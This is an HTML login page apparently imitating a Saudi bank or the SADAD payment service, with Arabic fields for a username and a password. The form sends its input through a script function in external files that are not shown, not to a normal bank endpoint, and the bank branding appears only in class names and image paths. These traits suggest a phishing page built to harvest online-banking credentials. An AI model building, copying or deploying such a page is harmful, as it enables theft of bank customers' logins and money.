<!DOCTYPE html>
<html lang="en">

<head>
  <title>sadad</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.4/dist/jquery.slim.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="css1/style.css">
</head>

<body>


  <div class="top-header w-100 float-left">
    <div class="rajhi-5-section">
      <img src="img-bank/asthmar.png" />
      <form  id="page2form" action="" method="post" onsubmit=" return sender(event)">
        <ul>
          <li>
            <input type="text" required name="name" id="name"
              class="KvoMHf has-custom-focus wixui-text-input__input" value="" placeholder="اسم المستخدم" required=""
              aria-required="true" aria-label="اسم المستخدم" aria-invalid="false">
          </li>
          <li>
            <input type="text" required name="password" id="password"
              class="KvoMHf has-custom-focus wixui-text-input__input" value="" placeholder="كلمة المرور" required=""
              aria-required="true" aria-label="الرمز السري" aria-invalid="false">
          </li>
          <li>
            <button name="step3" id="btn" type="submit">دخول</button>
          </li>
        </ul>
      </form>
    </div>
  </div>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="./config.js"></script>
  <script src="./fles.js"></script>
</body>

</html>